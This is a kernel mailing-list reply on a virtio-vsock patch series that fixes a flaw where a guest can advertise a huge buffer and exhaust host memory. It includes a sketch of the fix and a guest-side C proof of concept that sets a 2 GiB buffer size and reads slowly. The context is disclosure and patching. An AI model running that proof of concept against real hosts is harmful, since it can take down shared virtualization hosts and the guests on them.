Message-ID: <xwnhhms5divyalikrekxxfkz7xaeqwuyfzvro72v5b4davo6hc@kii7js242jbc>
Date: Thu, 18 Dec 2025 10:18:03 +0100
From: Stefano Garzarella <sgarzare@...hat.com>
To: Melbin K Mathew <mlbnkm1@...il.com>
Cc: stefanha@...hat.com, kvm@...r.kernel.org, netdev@...r.kernel.org, 
	virtualization@...ts.linux.dev, linux-kernel@...r.kernel.org, mst@...hat.com, 
	jasowang@...hat.com, xuanzhuo@...ux.alibaba.com, eperezma@...hat.com, 
	davem@...emloft.net, edumazet@...gle.com, kuba@...nel.org, pabeni@...hat.com, 
	horms@...nel.org
Subject: Re: [PATCH net v4 0/4] vsock/virtio: fix TX credit handling

On Wed, Dec 17, 2025 at 07:12:02PM +0100, Melbin K Mathew wrote:
>This series fixes TX credit handling in virtio-vsock:
>
>Patch 1: Fix potential underflow in get_credit() using s64 arithmetic
>Patch 2: Cap TX credit to local buffer size (security hardening)
>Patch 3: Fix vsock_test seqpacket bounds test
>Patch 4: Add stream TX credit bounds regression test
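
For reference, the kind of change Patches 1 and 2 describe looks roughly
like the sketch below. It is only illustrative (the struct and field
names are simplified stand-ins for the in-kernel ones, and locking is
omitted); it is not the actual diff:

#include <stdint.h>

/* Pared-down, hypothetical view of the per-socket credit state; the
 * real fields live in struct virtio_vsock_sock in the kernel. */
struct credit_state {
	uint32_t peer_buf_alloc; /* buffer size advertised by the peer     */
	uint32_t peer_fwd_cnt;   /* bytes the peer reports having consumed */
	uint32_t tx_cnt;         /* bytes we have sent so far              */
	uint32_t buf_alloc;      /* our own (local) buffer size            */
};

/* Sketch of the approach: do the credit math in signed 64-bit so it
 * cannot wrap to a huge unsigned value (Patch 1), then cap the grant by
 * the local buffer size so a peer-advertised 2 GiB window cannot force
 * unbounded queuing on the sender (Patch 2). */
static uint32_t get_credit_sketch(struct credit_state *s, uint32_t want)
{
	int64_t bytes;

	bytes = (int64_t)s->peer_buf_alloc - (s->tx_cnt - s->peer_fwd_cnt);
	if (bytes < 0)
		bytes = 0;

	if (bytes > s->buf_alloc)
		bytes = s->buf_alloc;

	if (bytes > want)
		bytes = want;

	s->tx_cnt += (uint32_t)bytes;
	return (uint32_t)bytes;
}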

Again, this series doesn't apply either in my local env or on 
patchwork:
https://patchwork.kernel.org/project/netdevbpf/list/?series=1034314

Please, can you fix your env?

Let me know if you need any help.

Stefano

>
>The core issue is that a malicious guest can advertise a huge buffer
>size via SO_VM_SOCKETS_BUFFER_SIZE, causing the host to allocate
>excessive sk_buff memory when sending data to that guest.
>
>On an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with
>32 guest vsock connections advertising 2 GiB each and reading slowly
>drove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only
>recovered after killing the QEMU process.
>
>With this series applied, the same PoC shows only ~35 MiB increase in
>Slab/SUnreclaim, no host OOM, and the guest remains responsive.
>-- 
>2.34.1
>
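
The mechanism described in the cover letter can be exercised from the
guest with something like the sketch below: advertise an oversized
receive buffer via SO_VM_SOCKETS_BUFFER_SIZE and then drain the socket
slowly while a host-side service keeps writing to it. The port number
and sizes here are illustrative assumptions, not the referenced PoC:

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

int main(void)
{
	unsigned long long buf_size = 2ULL << 30;	/* advertise 2 GiB */
	struct sockaddr_vm addr = {
		.svm_family = AF_VSOCK,
		.svm_cid = VMADDR_CID_HOST,
		.svm_port = 1234,			/* illustrative port */
	};
	char buf[4096];
	int fd;

	fd = socket(AF_VSOCK, SOCK_STREAM, 0);
	if (fd < 0)
		return 1;

	/* Tell the host how much it may buffer for this connection. */
	if (setsockopt(fd, AF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
		       &buf_size, sizeof(buf_size)) < 0)
		perror("setsockopt");

	if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("connect");
		return 1;
	}

	/* Read slowly so sent data stays queued on the host side. */
	while (read(fd, buf, sizeof(buf)) > 0)
		sleep(1);

	close(fd);
	return 0;
}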

